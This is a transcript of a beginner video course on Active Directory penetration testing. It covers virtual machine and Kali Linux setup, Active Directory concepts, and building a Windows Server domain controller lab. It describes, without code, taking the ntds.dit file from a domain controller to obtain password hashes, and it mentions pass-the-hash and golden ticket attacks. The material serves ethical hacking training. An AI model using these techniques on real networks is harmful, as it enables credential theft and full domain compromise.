what's up YouTube Welcome to this course on active directory hacking for beginners my name is Heath Adams and I'm going to be your instructor for the entirety of this course now this course was in addition to our practical ethical hacking course and our practical ethical hacking course is a 25 hour course that includes a lot of material and we just ended up revamping the entire active directory section of this course so as always when we do a revamp we release the older material for free so you can come in here and look at what this course has to offer this is part of our all access plan so if you want to check out this course or any of the other material you're welcome to see a lot of it on our YouTube channel but we have all the up to date and everything else material here on our all access pass and within this course so if you came and checked out the all access pass just as an example you do get access to all the courses that we have here so we have our practical ethical hacking course among all kinds of other hacking courses we've got python courses rust coding courses got malware analysis mobile pen testing and hacking Windows forensics all different kinds of stuff we just even added iot hacking and detection engineering very recently with that being said everything taught to you in this course is still relevant just because we revamped the material does not mean that this material is not good otherwise I would not put it on my YouTube channel nor would I risk that reputation so I do want you to enjoy this if you are somebody that is interested in hacking you can set up a Linux machine which will give you instructions for and you have some basic knowledge about computers and computer networks this will be a very very fun course for you now I do want to pitch you on a few things and that's going to be it for the entirety of the video you're going to get five hours of material all for free but I do want to say a couple things before we do get started here if you find that you fall in love with active directory hacking and you want to learn more we do have certifications revolving around active directory penetration testing and other penetration testing we've got our pjpt certification which is our Junior penetration tester certification and then we have our pnpt certification which is our Advanced penetration testing certification both of them revolve around active directory and they both require you to actually hack a domain as part of the process the pjpt is the baby course and it does come with training including that 25 hours of materials that we just talked about the pmbt also comes with that 25 hours materials plus another 25 hours material and it's a little bit more advanced but both of them do come with free retakes they are your own individual lab and exam environment they're very stable and they have great feedback don't trust me go look on Google go search the internet search for these exams and you'll find the reviews out there the other thing I want to point out is hey if you're interested in this we are running a class on September 16th of 2023 that's our next class for hacking and defending active directory this is entirely up to date and is great for you if you are interested in hacking if your assistive administrator and you just want to learn how to defend your network or anything like that very affordable training here you have the option to also do our pmbt accelerated program which is also live we're running these every month or two so if you miss out on this one not a big deal there will be more opportunities and hopefully we'll see you in one of these awesome live trainings I'll put all this in the description below now if you're a YouTuber in today's society you'll probably like get on with it let's go let's get into the material I don't got time understand last thing if you like this video please consider subscribing to the channel we do put out a lot of free content a lot of course material like this and a lot of content related to hacking and other cyber security related items so please do consider subscribing hit the like button tell a friend share with everybody else leave a comment down below let us know what you think and with that out of the way please enjoy this five hour course on active directory hacking all right so in order to be successful in this course we are going to be utilizing what is called a virtual machine now virtual machines are known as VMS for short and a VM is just a machine on top of a machine and to give you an example I'm actually running this Windows 10 instance that you see here on top of my Windows 10 instance so here you can see if I scroll up that I have a Windows 10 machine I also have a Linux machine sitting here if I were to demaximize this you can see that I'm actually running here a Windows machine in the back this is my wife and I and you come through here we just blow it back up and we're back inside of our machine so a virtual machine is just a machine inside of a machine so what we're going to be doing is we're going to be utilizing this to build out Labs that way we don't have to actually have a bunch of Hardware we can just use this for our our course and run what we need to on top of our own machine already now this can get resource intensive so if you are only utilizing something like eight gigabytes of RAM then you might have some issues with this but you can still follow along when we get into the active directory portion you might run into issues if you do not have at least 16 gigabytes of RAM to utilize but we'll worry about that when we we get there there's still plenty of ways to follow along throughout this whole course so another thing to note is that I use VMS every single day this machine that you see here is actually my day-to-day pen testing machine so I run a Kali Linux instance on top of my Windows machine and utilize that to do penetration testing so I'm going to demonstrate that to you and how we're going to build out our Labs with that and a lot of us in the industry run through VMS as opposed to running it directly on metal or on a machine so in order to utilize virtual machines we first need some sort of virtual machine software to play these so there are two different ways that we can do this if you are on a Windows machine or a Linux machine you can utilize VMware Workstation player now if you type in VMware Workstation player in Google the first one here that says download VMware Workstation player you just click on that and if you are in a Mac environment you're going to be utilizing Oracle virtualbox so if you type in Oracle virtualbox you come here and you go to downloads you have your option there as well so in this course I will be using VMware Workstation player I'm going to be running it on top of Windows if you are using Mac that is absolutely fine you're going to be following along just the same all you need to be able to do is follow the same instructions that I give you and you will be a-okay so if you scroll down here you can see try workstation player for windows or try a workstation player for Linux go ahead and just select download now that should bring up a download and go ahead and save it if you're doing virtualbox go ahead and download for OS X I will download the windows version just so that we can uh we can see what that looks like as well so I'll save both of these so let's view our downloads and we've got VMware Workstation player here I'm going to go ahead and open this one and we're going to install this and this will be very point and click so next accept the agreement possibly give away our first child yeah we should go ahead and install the enhanced keyboard driver while we have this and then we don't need to enjoy join any Improvement programs or check for product update that's okay we will install desktop start menu you check check your preferences as you like it I'm just going to install this and this should just finish here in just a second okay then you'll be brought to this screen once everything's done it should take about a minute or two and we're going to go ahead and hit finish and it's going to want a restart to take effect you can go ahead and restart your system I'm going to say no right now let's go ahead and install virtualbox if you are a Mac User we'll hit next here next and yes and install except and again vary point and click with the installation select install on any options that do pop up and then we can start Oracle VM if we want let's go ahead and just start that this is what Oracle VM looks like and let's see if we can start the VMware Player here even though we need to restart and this is what VMware Workstation player looks like so here you can see that we have virtual machines we can create new virtual machines open ones Etc we'll get into that in the next video so again if you are using Windows or Linux this is probably what your view is going to look like for the rest of the time if you are using Oracle on a Mac this is what your view is going to look like another site Pro tip here is that I am using workstation Pro and I might utilize this in some instances throughout the course other instances I'll be utilizing the workstation player they are not much of a difference especially in the beginning when we get into the active directory portion it might actually be worth it for you all to download the VMware Pro trial because the trial is 30 days and you can utilize that to get through some sections and actually have nice little Windows here to to be clean and just have a pro Edition you can do everything I'm going to show you in the course on the player it just is that you have to open if you want to run more than one machine you you'll just have to reopen the VMware Workstation player several times to run multiple machines but that's okay it just won't look like this nice clean layout where you can transfer between machines like I can do just here so with that being said let's go ahead and move on to the next video we're going to be installing Kali Linux onto our VMware Workstation player now that we've installed VMware or virtualbox we need to install Linux we're going to be using a version of Linux called Kali Linux throughout this course this version of Linux is a Debian based distribution which is geared towards ethical hacking and penetration testing so it's a special version of Linux that allows us to have all the tools in one place that will allow us to hack without having to download these tools and install them on our own custom Linux distribution so it's all kind of nicely built into one package so if you go out to Google and you type in Kali Linux download you should see this link I'll put the link in the description below as well but you should just be able to go to get Cali right here and you're going to be presented with a couple of options here we're going to be using a virtual machine in this course so we're just going to go ahead and click on this virtual machine option and that's going to take us down just a little bit here what you're going to do is you're going to download the respective version that you need so if you need VMware you download VMware you're using virtualbox go ahead and download the virtualbox one now they have a direct download which is a 7-Zip and they also have a torrent if you know how to torrent what you're going to do is go ahead and download the file that you need and while you're doing that if you do choose to download directly you're also going to need a tool called 7-Zip or a way to unzip this file so go ahead and start your download while it's downloading let's also go ahead and navigate to 7-Zip so if you go to Google and you look at 7-Zip you'll see this page here comes up you just go to download in here you're going to download the file that is for your respective system so here I'm using Windows on 64-bit I would download this executable right here now if you're running on Linux here's where you download Linux if you're running on Mac OS here's where you download for Mac OS very straightforward I've already got this installed but what you need to do is just download this and literally click next through it make sure you get it installed go ahead and pause the video once that is installed 7zip that is and once you have the actual Cali image downloaded go ahead and unpause the video I'll be here waiting for you okay so your next step should look something like this you have your 7-Zip file open you should see a folder located in there and the easiest thing is to just drag and drop this you can also right click and extract if you know where you want to extract it I created a folder called Cali I'm just going to grab this and I'm going to drag it over and it's going to take a minute here just a few seconds honestly to unzip the file size of this one at least for the VMware version is around 11 gigabytes or 11 gigabytes exactly unzip so make sure you have the space on your hard drive in order to do this now once you have it unzipped you can go ahead and just double click in here you'll see a bunch of files if you have VMware installed you can actually just double click on this vmx file and that should open things up for you I'm just going to show you the other way around doing this as well so with VMware Workstation player open what you're going to want to do is go to open a virtual machine and in the folder that you have you should see this vmx file as well again you could double click it or you could just open it through this what's going to happen is it's going to open that file here and you're going to want to edit this virtual machine settings once you have it loaded click on edit virtual machine settings and in here we're going to want to First change the amount of ram that we have now this is dependent on your system if you have like eight gigs of RAM or maybe even 16 gigs of RAM you might want to try leaving it at 2 at first I'm going to bump mine up to four gigs which is 40.96 and I have a 128 gigs of RAM so I have more than enough space to allocate for this but if you again if you're on like eight gigs of RAM probably not the best idea to Jack this up Beyond two honestly I would try it at one maybe two see how it works the other thing you're going to make sure of is that you're running on Nat Network so if you click on network adapter make sure that it says Nat and that's selected once that's selected go ahead and hit OK and then you're just going to hit play Virtual Machine when it asks you what to do just say I copied it now from here it's going to take a minute for this to load you can just let this run through it'll boot on its own once you are presented with the login screen go ahead and unpause the video but until then pause and I'll meet you back when you're at the login screen okay I'm at the login screen I'm going to make this a little bit bigger just so we can see and from here what I'm going to do is I'm just going to type in the username of Cali k-a-l-i and the password of Kali k-a-l-i hit enter and if you see this screen congratulations you have successfully installed Kali Linux and you now have it up and running in later videos we're going to cover what we're going to be doing and how to use this and how to use Linux and all this but for now pat yourself on the back you've got Linux installed and we're going to pause here and move on to the next video okay so this video pertains to some updates we need to make to virtualbox for quality of life so if you're not using virtualbox you can go ahead and skip this video if you are Buckle in we just need to do a couple of quick updates and then we should be good for the rest of the course so go ahead and go out to Google and Google virtualbox extension pack what it's going to bring up is just the downloads page of virtualbox so we're going to want to go here and on this page if you look kind of towards the middle you'll see that there is a virtual box extension pack here we're going to just click all supported platforms and that will automatically download the file that we need so once that is downloaded and pause if you need to go ahead and open virtualbox and you can come in here and up at the top we're going to go ahead and click on preferences and from here we are interested in extensions see extensions right here go ahead and click on that there's a little plus sign we're going to go ahead and click on that and then you should have your downloads right here so we're going to take the downloads and just go ahead and install that hit install read this give away your firstborn accept all the terms and you should be good very quick install okay the second thing we need to do is we need to come to the one tab appear above which is Network we're gonna go ahead and hit the network button or this add button and we're going to add what is called a Nat Network okay and we're going to come in here and we're going to double click and you can go ahead and keep these defaults I'm going to actually change them to 192.168.57.0 because that's what's going to be used through the rest of the course and that is what the cider notation of my Cali machine and my key Optics which you'll see later Etc all fell into this 57.0 so we're going to go ahead and keep it on this Nat Network make sure you support the hcp go ahead and just hit OK hit OK and then for a machine and make sure any machine that you use again any machine that you use in this course make sure you set it to Nat network if you're using virtualbox so you can come in here click on a machine like this mail machine I have here you can just click on that settings go to network and then you can go ahead and just go to Nat Network all right and that name right here you see namenet network that's all we're going to use that'll automatically set it up so when you have a Cali machine running later and you have kiopteryx or another box running or even when we build out an active directory lab you need to make sure that you're running that net Network so that all the machines are on the same subnet if you don't you might run into a situation where the same IP comes up for the same machine and then they're conflicting with each other or you get on different networks and some weird stuff happens so make sure again that it's imperative that you're setting that net Network for every single machine that you're setting up so with that said we're going to go ahead and move on to the next video in this section okay there's one last thing we need to do in order to get our lab build set up here we're going to go ahead and open a terminal here in our Kali Linux or this recording I am on 2023.2 so what we're going to do is install a tool called Pimp My Cali this is going to allow us to install all the tools necessary for this course so when we come in here we're just going to go out to Firefox and you can just go out to Google and from within Google all we need to do is just come in here and search pimp my golly just like that you should be brought to this page here where it says Pimp My Cali DeWalt Arch just click on that and we're going to go ahead and just go to this code here and copy the github.com link that you see here so just click copy and so what we want to do I like to put this in the opt folder so if we CD over to opt here and we just come in here and let me check if I've already got installed I don't here which is good okay so we can come here and we can say something like sudo get clone and then we'll just paste this Pimp My Cali here hit enter type in your password which should just be Cali and it will clone this once you have it cloned go ahead and CD into Pimp My Cali and from here you will have this script pimp mycali.sh all you need to do is run sudo dot forward slash pimpmycalley.sh just like that okay from here we're going to hit enter and it's going to ask you what do you want to run here what you're going to run is a new VM setup right here okay new VM setup so you can just hit and on that I'm not going to run it because I already have this installed I'm going to hit X to exit here all you need to do is run that new VM setup there will be a few prompts that come up that you have to click through don't worry about that just click defaults for everything except and you should be good to go now you have the option from within this tool to have a root user or not a root user I am not using a root user here I would recommend not using that as well so somewhere within here it will ask you hey do you want to add a root user you don't have to worry about that all right everything we're going to do is from within our Cali user in this in course so just make sure you get all the tools set up if you don't do that then you will have problems when it comes to actually going through all the active directory material so that is it we're going to go ahead and go from here and jump into our active directory hacking stuff so I'll see you over in the next video welcome to the actor directory portion of our course now I'm super excited to cover this part of the course because I think it's one the most overlooked part of any course that's out there right now now some courses are starting to touch on it but a lot of them are failing to do so and two it's as you're going to find out one of the most important items to learn when it comes to ethical hacking and three a little bit biased but internal slash active directory pen testing is by far my favorite it goes so deep there's so many possibilities and these questions that are going to come up or these this building a lab everything that we're going to do in this section of the course is going to come up in an interview and you're going to be ready to nail those sections because you're going to have a lot of these answers down so I'm very very excited to start covering this so before we can do that I do have a little bit of Death by PowerPoint we're probably gonna do two to three videos we'll keep them short as possible but you have to understand what active directory is before we can go out and build active directory and then attack actor directory so let's get started so what is active directory well you could think of active directory as like a phone book okay and this phone book stores all kinds of information these information you can think of them as objects and that's something like a computer or a user or printer all these objects are stored in this phone book and we call these directory services and active directory is used by windows now chances are if you've ever worked in a work environment you've probably used active directory and we'll cover that a little bit on the next slide as well think about logging in at your computer you you get to work you log in at your computer you probably have you know a username and a password and you go you log in with that username and password but say maybe there's another computer either in a different building or just in a different location or maybe you have a laptop and you go to use that computer and you use the same username and password and then when you sign into your email use the same username and password and it's because you're using something called active directory so you can have just this one username and password and you can authenticate around the network using these credentials and now this authentication is going to be using something called Kerberos and we'll talk about that a little bit later in the course and specifically how we can attack it but for now just know that authentication on Windows based devices using active directory uses something called Kerberos and they use tickets so why active directory why is it so important well active directory is the most commonly used identity management service in the world now 95 of the fortune 1000 companies use it in their networks 95 so let me break this down for you like when we do internal assessments we do internal pen tests never have I ever had an environment that I pen tested against that was not active directory this is so important when it comes to interviewing when it comes to real life experience this is the bread and butter everything as I said before all these courses out there they teach external not a lot teach internal this is really where the money is made so being able to exploit an environment from the inside super super important so again with active directory the nice thing too is we can exploit it with however being an exploit available to us so there doesn't have to be a patchable exploit in the environment we could take advantage of what active directory does by default what it's considered in some cases a feature and exploit that so we can abuse features trusts components there's so many different things of active directory that we can abuse because they're features that's a really nice thing as well so it comes down as you're going to see when we talk about defenses it comes a lot down to policy and a lot of policies are just not in place in environments and internal assessments can be bloodbaths when I talked a few videos ago about these external networks and them being fortified and that you're really not going to find your way in that easily and then the internal Network being like the inside of a house you fortify the the external you fortify you're outside of your house but you really don't think about the locks on the inside and that's what happens a lot of times with active directory it can get messy very fast so it's important to have this knowledge it's important to understand how to attack it and what some of the common attacks are it's important to know what active directory is as a big overview so we're going to cover what active directory is as overview and then we're going to dive into building our lab and we'll dive into attacking our lab it's going to be super super fun this is my favorite part of the course so let's go ahead and move into the next video we're going to start talking about physical active directory components so for this video and the next video we're going to talk about physical components of active directory and then we're going to talk about The Logical components of active directory so I'm only going to introduce Concepts and ideas that pertain to this course on The Logical side I am going to introduce some Concepts and ideas that are out of scope for the course but I think are still important but for the physical side I'm going to limit it to what's in scope as to not confuse you or make things any more complicated because active directory can run really deep really fast so we're going to give a high level overview and then it'll make a lot more sense once we start building things out so let's talk about two very important physical active directory components so the very very most important active directory component is what is called a domain controller so if you've never heard of a domain controller that is the head honcho of all the servers right when you set up active directory you have what is called a domain controller now the domain controller has a lot of features that it provides and does for the environment it hosts what is called the active directory domain Services directory store meaning it hosts your phone book remember we talked about it being a phone book it has all the information on the users the computers of what printers are in the network Etc it knows everything on top of this it's providing authentication and authorization so going back to the last video when we talked about Kerberos it's doing that at the domain controller level and if we're in what's called a forest or in a domain where we have a parent-child situation which we're going to talk about in The Logical side of things it does replication so that way the other forests or other domains when you make an update to one item in one domain controller it updates across the board now we'll talk about that here in just a second but also we have administrative access with the domain controller so that is to manage user accounts and network resources as you're going to see when we build our domain controller what we do is we go in there and this is where we can add users this is where we can add our computers where we can add policies we can do all different sorts of things we do it at the domain controller level so when we talk about domain controller again it's the head honcho it's the top dog when we attack an internal Network it's very very bad if we can compromise your domain controller because that means we can compromise the whole network potentially so depending on how big the network is if it's just one one domain and we compromise the domain controller we've compromised everything okay so this is one of the top targets when you're doing an internal assessment though it's not the only Target and I should note do not get your eyes set on just doing domain controller compromise and that being it when it comes to active directory pen testing or internal pen testing there's other information that clients might want as well think about potentially pii or personally identifiable information especially if it's related to like Social Security numbers or sensitive information about people think about any kind of credit card information that might be obtained think about any kind of proprietary information that you might be able to obtain as well so don't just go for domain admin or compromising the domain controller think beyond that think what could you do as an attacker that would be really damaging to a client now from here let's also talk about active directory data stores so the big takeaway from the active directory data store is that it holds this file called the ntds.dit d-i-t okay and this file is very very sensitive now typically when you compromise a domain controller you want to grab this file why do we want to grab this file well it contains everything that is stored in active directory data that means all the users the objects the groups Etc more importantly it contains password hashes for all users in that domain so when you compromise that domain controller and then you go get the ntds.dit file guess what you've got all the password hashes doesn't mean you have all the passwords but you have the hashes you can take them offline try to crack them you can attempt past the hash attacks you can attempt golden ticket attacks with the hash and I know you might not know what all these are right now but we're going to see why compromising this ntds file will lead to amazing things as an attacker for us when we get into the attacking side of things so that's all I want you to take away from this I want you to take away these two components a domain controller and the data store because the domain controller is one of our primary targets as an attacker that is the the big cheese right we want to attack it we want to compromise it because that's where all the data is stored that's what's doing our authentication that is where everything about anything is there and we're going to live inside of the domain controller for a while when we're doing our lab build we set everything up we set up our policies you're going to get a good feel for what exactly you can do on a domain controller and then know the data store the data store has this ntds file and that file includes all information from active directory data including password hashes big big big thing to remember so that's it from here we're going to talk quickly about logical items and then we're going to move on to building our lab which is going to be super exciting all right let's talk through the logical components of active directory and you're going to hear these terms over and over again so I'm going to walk you through them briefly and then you'll hear them as we go through the course and it's just good to have that familiarity with the names and kind of what they mean behind it so up first is what is called the active directory schema and you can think of a schema as a rule book or a blueprint basically what it does is it contains definitions of every object that can be created in active directory so you see here it just says it enforces rules regarding object creation and configuration that's it when you hear the schema all you got to think about is the rule book you don't have to think too much more complex about that it just enforces rules about object creation more importantly is what are called domains so domains are what is used to group things together so we can group our objects together in a single organization and you can see here that we've got a single domain this contoso.com which is all these sources are provided by Microsoft Virtual Academy and it's just one domain and if you have like a small business think of a small business you might just have one domain that you're on and this one domain has all the users computers every object inside of it because all you need is one domain so we have this one domain and it functions like a domain controller and we could see down here in the description that there are administrative boundaries for applying policies and they are authentication authorization and this looks very familiar to what a domain controller was except now we're just managing it all in what is called a domain so when you see like a.com or dot org you think of that as a domain not very different when we are building it out in our Network we also have what are called trees now trees are a group of domains and they're kind of in this hierarchy so you see again we have this example of this contoso.com well what if contoso.com is the big namesake and then we have two child domains so we've got a a parent domain and then we have a child domain or two child domains and we have a division in North America so we've got na.contoso.com and then we have a European so we have emea.com so when we have trees we have this parent and then we've got these children when it comes to domain and they have what is called a trust with them that is 2A transitive and we'll talk about trust here in just a little bit but just know that you have the parent and then you have the children and they share namespace and they share some trust between them and then we have what is called a forest now forests are just a collection of these trees so if we have one tree and it's maybe contoso and then you have another tree and maybe it's a different business name but they link together one way or another and you can have different sort of trusts between these forests so we'll take a look at that again in just a second but just know that these build up and they stack as they get bigger and logically we start with the domain and then we have a tree and then we have a forest okay and for the sake of this class or for the sake of this course we're only going to be working with a domain and a lot of times when you see even more advanced active directory courses mostly you're going to be working with trees where you have these children domains and you might try to escalate into a parent domain hardly ever do you see Forest but it's still important to know about them now inside of active directory there are what is called organizational units and you'll hear me refer to them as OU's that's the common terminology is an OU for these and these are just containers and they are containers for your users your computers your groups and you're going to see this once we start building out our active directory components you're going to see me go in and we're going to set up some different ous and have our users in one OU we'll have our groups in their own OU Etc so you'll see what they are but as of right now just think of OU's as organizational units okay and then we have truss now trusts are how we have access between resources now you can see that there is directional trust and transitive tries so if you have directional trust we have to have trust from one domain to the other domain okay so it flows from a trusting domain to a trusting domain now if we have transitive trust and then we have a trusting domain and a trusting domain but it also trusts everything that that domain trusts so if there's other trees or if it's in a forest then it trusts everything that trickles down and you can see in the image here where we have two trusts but then it's trusting everything that other domains are trusting as well so a truss is just a way for users to have access to certain resources that might exist in another domain and lastly we have objects so objects are what's going to be inside of our OU's our organizational units we're going to have these different objects so a user can be an object a group can be an object a computer printer shared folders you see all this thing in this list they can be objects so let's break this all down one more time so we have domains and domains are used to group and manage objects in an organization that's primarily what we're going to be working with in this course if you have multiple domains we have What's called the tree you might have a parent domain and then you might have the children domain and then when you have multiple sets of trees you're starting to build out a forest okay now inside of these domains or these trees these forests are what's called these OU's these organizational units and these organizational units consist of these objects all right and then the last thing to remember is across forests or cross domains we have what are called truss and these trusts can be directional meaning that one domain trusts another domain or they could be transitive meaning one domain trusts another domain and then trusts everything else that that domain also trusts okay so high level overview take good notes on this if you need to go back and watch it one more time but you're going to see this over and over and over especially domains and organizational units and objects we'll talk about trusts again throughout the course and we'll give some ideas about trees later on in the course as well though we won't actually be exploiting them so for this course big takeaways are domains organizational units and objects and remember what trusts are as well but it does not hurt to know all these things just to boost your active directory knowledge especially for an interview if it comes up so that is it now we're going to be moving on into our lab building and this is where the fun really begins we're done with the Death by PowerPoint so I'll catch you over in the next video where we start to build out our active directory lab welcome to the lab overview so before we build our lab there are a few things that I wanted to cover and that is what the lab is going to look like so our lab is going to consist of one Windows Server 2019 and then two Windows 10 Enterprise machines if we think about this and we think about this in a virtualized environment we have some minimum requirements we're going to have to use for one when we run isos or we run machines we need disk space on top of that we need RAM and to build this lab effectively we need about 60 gigabytes of disk space and 16 gigabytes of RAM I am utilizing much more than that in this course I'm using 32 gigabytes of RAM when I do this so here's how it should work we're going to have a Cali machine our attack machine and then we're going to have these three other machines now you might utilize two gigabytes of RAM for each so two gigs on Cali two gigs on the Windows server and then two gigs on each Windows 10 Enterprise machine that will give you about eight gigs of RAM usage not including anything else that you're running meaning your base Os or any of that so please keep in mind that you need at least 16 gigabytes of RAM for this course to be effective if you have more than that that's great you can start assigning maybe like four gigs if you want to each machine I'm only going to assign two just to keep it to the bare minimum on speed requirements and if you do not meet the requirements which I completely understand not everybody has a 16 gigabyte RAM in their computer right that's okay please follow along take notes take screenshots download the tools play around with them and understand them there's still going to be examples with some hack the Box machines that we encounter later on in the course that's going to allow us to utilize some of these attacks and you can play around with those and you still can understand what's going on even if you can't do it Hands-On fully I understand this is a limitation but this is also a good time if you've never built a lab and you do have these requirements to build out this lab to fully understand and it if you need something you can go out and purchase a cheap server they have a bunch of those on eBay and build uh our isos to these requirements as well but for me I'm just running with enough disk space and enough RAM to actually be functional and again if you don't have the requirements do not stress out about it there are plenty of people who have done similar builds with me before and they didn't have the requirements and they still learned a lot so please just consume the information that is about to be presented to you and understand what we're building why we're building it what we're attacking and why we're attacking it and you're going to kill it in your job interview I promise you so from here let's go ahead and start downloading our files that we need and let's start building out this lab before we start building our lab I wanted to add an alternative and this is going to be building the lab in the cloud using azure now this article from Cameron Bill Grammy is fantastic I'm going to link it in the resources and I'm going to direct you to it this should be an alternative if and only if you do not have the computational resources to build the lab out in your own home environment now things to be said is first and foremost this will require a credit card using Azure requires resources out in the cloud that costs money make sure that you have a credit card and you're willing to spend some money to build out this lab this could be an alternative if you do not have a computer or you can't afford the resources say extra Ram or CPU Etc building out an Azure lab like this is going to be relatively cheap comparatively and you get I believe at the time of this recording two hundred dollars when you first sign up for Azure in credits the second thing to point out is we will not support this lab if you build it so we will have we have technical support we are not going to support this lab this is just an alternative if you want to go ahead and look into another option and you want to follow along with building lab and you do not have the resources otherwise I think this is a great lesson on how to build an attack lab in Azure how to build out active directory Etc there is a lot of detail here I can scroll for quite a while and it is the exact lab build that we use in the course he just took it and he went and made it in Azure in the cloud I think this is fantastic I think it's awesome and I I think it should be pointed out as an alternate resource but again it costs money and we will not support any sort of technical troubleshooting for this so take your own risk if you're going to go down this route but it is a great alternative if you so choose alright let's get started with building our active directory lab so go ahead and go out to Google and search for Microsoft evaluation center so we're going to search for that and the very first link that comes up this Microsoft evaluation center that's what I want you to go ahead and open when you're there and if we scroll down just a bit we have check out the latest products so what we are after here is is we're after Windows let's go ahead and click windows and we're going to right click on Windows 10 Enterprise and just open that in a new tab and we also want Windows Server so we're going to click on Windows server and we're going to grab Windows server 2019. so we're going to right click open a new tab and now we should have access to both Windows 10 and Windows Server now Windows 10 license is good for 90 days do not worry about it if you go over the 90 days it's just going to give you a little warning in the bottom saying your license is expired I have a lab right now that's built off an expired license that I use just for practicing attacks and it has been probably over a year since I have used the lab with the evaluation licenses and it's fine so we're going to do is we're going to download both of these and we're going to download the Enterprise ISO so I'm going to go ahead and just hit continue and then I'm going to hit continue here on ISO so we're going to download the iso for Windows Server 2019 and it's going to ask you for your information go ahead and fill this information out and get your file downloaded so once you enter in your information it does not have to be true information I should add you will get to this section here for Windows 10 Enterprise that says do you want 32-bit or 64-bit go ahead and select 64-bit and then select your language let's go ahead and choose English and then download and it's going to download a file this file is 4.6 gigabytes for me so make sure you have space wherever you're installing it so I'm going to go ahead and hit save and let that download with the Windows Server evaluation all it's going to ask for is your language we're just going to go ahead and select English and select download as well and this is also 4.9 gigabytes same range here so I'm going to go ahead and save that and now these are going to download so these are Big File sizes it's taken a little bit of time here and I'm on gig fiber so go ahead and let your files download and then go ahead and meet me in the next video where we start installing Windows server 2019. so let's first install Windows Server 2019 which is going to be our domain controller so let's go ahead and click on create a new virtual machine and yes you are reading this correctly Hannah Montana does have a version of Linux that we were playing around with on a stream so that's the last thing that I installed on this computer go ahead and go to browse and then here go ahead and select your ISO so I'm selecting my server eval ISO right here go ahead and double click that and it says Windows Server 2016 is detected not exactly accurate but that's okay we're gonna go ahead and hit next and it says what do you want to install 2016 data center or standard we're going to go ahead and just say standard and now the rest of this you can go ahead and leave blank we don't need a product key because this is eval and you won't need a password either go ahead and select next it's going to prompt you and say you didn't enter a product key we're going to say yes we want to continue and then go ahead and choose where you want this virtual machine to store I'm going to go ahead and just let this store on my actual C drive here and I'm going to hit next and then it's going to ask you how much file size you want for this so I'm going to go ahead and just say 60 gigabytes and split the disk into multiple files this is not going to take up 60 gigs it's probably going to take up somewhere around 10 to 20. once we have all three machines we'll probably take up 60 gigs in total so we're just going to go ahead and hit next on this and then at this last step here go ahead and select power on this virtual machine after creation make sure that's unchecked and then hit finish and now we have our Windows Server 2016. we're going to go ahead and select edit virtual machine settings and in here we have this floppy drive we want to make sure this floppy Drive is removed you see this using Auto install if we don't remove this it's going to try to install this weird file it's going to ask for a key it's just not going to work for us so let's go ahead and just remove that completely now we're going to use a netted Network for this so go ahead and just say use to share the host IP we'll select Nat on the memory side go ahead and select two gigs of memory if you have it you could select a little bit more say you're running 32 gigs for example you could select more but go ahead and just use your two gigs so let's actually pause here with a small update now I said two gigs was fine and it probably is but we've noticed with our student lab builds that two gigabytes can tend to slow things down just a bit when we're installing and doing the setup so we highly highly recommend that you set this to four gigs here and then if you need to revert because you don't have as much RAM revert back to two gigs once you have the domain controller installed and the same goes for setting up the user machines in the next video use four gigs then you can turn it off set it to two gigs and then reboot the machine and we're going to go ahead and just say okay here now from here go ahead and select play Virtual Machine and have your fingers ready click in it and it's going to say press any key press any key so make sure you do it really quick and get it to boot otherwise it's going to go into this funky thing and it's not going to work for you so make sure you press any key this is going to spin up really quick and then we're going to go ahead and enter some information here so your install should look like this it should say Windows Server 2019 and then go ahead and select your languages I'm going to be using English United States for all of this and I'm going to hit next and then I'm going to select install now and it's going to start bringing up this setup so for the magic of video I'm going to pause in between on these recordings and then I'm going to let them finish and then we're going to go ahead and move on to the next one so from here let's go ahead and select Windows Server 2019 standard evaluation this desktop experience and we're going to select next and then once it starts installing I'll go ahead and pause I accept the license terms hit next we're going to select custom install down here and we have drive zero unallocated space go ahead and select new and then we're going to hit apply and say okay and you're going to see that it creates a bunch of different partitions for us and really we only have a little bit here that we need for actually installing and then the rest is going to be free space when we need it so let's go ahead and hit next and now this is going to take a little bit of time to install so go ahead and let yours install and then meet me back when you're ready for the rest of the steps okay your computer should have restarted and brought you to a screen that looks like this where it says customize settings so here we have an administrator user and we're going to need to enter a password in so I'm going to be entering in a password of password but it's going to be a capital P and then it's going to be the at symbol two dollar signs a lowercase w a zero Rd exclamation let me show you what that looks like in a notepad looks just like that you can put any password you want here but just this is what I'm going to be using for this course so I'm going to go ahead and type that in one more time and go ahead and hit finish and now it's finalizing our settings we have this control alt delete to unlock so to do that go ahead and just come up here send control alt delete and then log in with your new password and now it's going to load up your profile and this may take just a second to get ready okay so from here we're going to click this full screen you're going to see that we're not full screening so we're going to have an issue with full screen what we're going to need to do is to install our tools here so we have a tools that we can install if we go to manage and say install VMware tools click on that and select install this is going to allow us to actually have a full screen on this machine so now it has popped up and said DVD drive VMware tools select what happens let's go ahead and just click on it and say run setup64.exe this is going to run the installation and then we're going to need to reboot afterwards so from here hit next we'll do a complete install next and install okay and you can see that it's already made it full screen for you and it says you can restart your system and we'll just go ahead and say no we plan to manually restart there's a few more things I want to take care of or at least one so let's go to the start menu and we're going to type in computer and it says view your PC name right here go ahead and select view your PC name and we select rename this PC right here and now name this what you want to name your PC so this is the domain controller I'm going to name it something that is significant that you know resembles a domain controller so for this I'm just going to name this Hydra DC now my theme is going to be a Marvel theme I kind of like Marvel Comics type stuff so I'm going to make this a Marvel themed domain controller you can make this whatever you want so you can just make this my domain controller if you want but I'm just putting in here Hydro Dash DC and then I'm going to say next and it's going to prompt you to restart your computer now or restart it later go ahead and hit restart now and we'll just say other unplanned is fine hit continue let this restart okay so you should be taken to a login screen now so go ahead and hit Ctrl delete again go ahead and put in your password up here and you should sign in now every time that you load on a server like this you're going to get the server manager that pops up and we're going to go ahead and work on installing a domain controller here so what we're going to do is we're going to go up to manage and we're going to say add roles and features up here and we're going to go ahead and just click next here role-based or feature based installation we're going to select next again and then the server role that we want to add we're going to go ahead and say active directory domain Services right here so remember adds you saw that a bunch of times this is exactly what it is go ahead and say add features select next select next and then we're going to say install and go ahead and let this install once this is completely installed go ahead and unpause your video and meet me back here and we'll focus on the rest all right now your feature installation should be complete go ahead and hit close you can see we've got this little alert up here let's go ahead and click on this flag and you see it says promote the server to a domain controller so we haven't done that yet let's go ahead and do that and now it's going to ask us for some information so it's going to say how do we want to deploy this and we're going to say let's go ahead and just add a new forest and what do we want to call this root domain name so I'm going to call this Marvel dot local so go ahead and give it something to that effect whatever you're going to call your domain give it that and then a DOT local so we're just saying dot local instead of.com or dot org whatever you want your domain name to be so for me again marvel.local go ahead and select next and this might just take a minute okay from here we're going to go ahead and give this a password whatever password we want for this directory Services restore mode you can make it the same thing like password I'm just going to do that okay and then go ahead and hit next and we're going to select next for this this 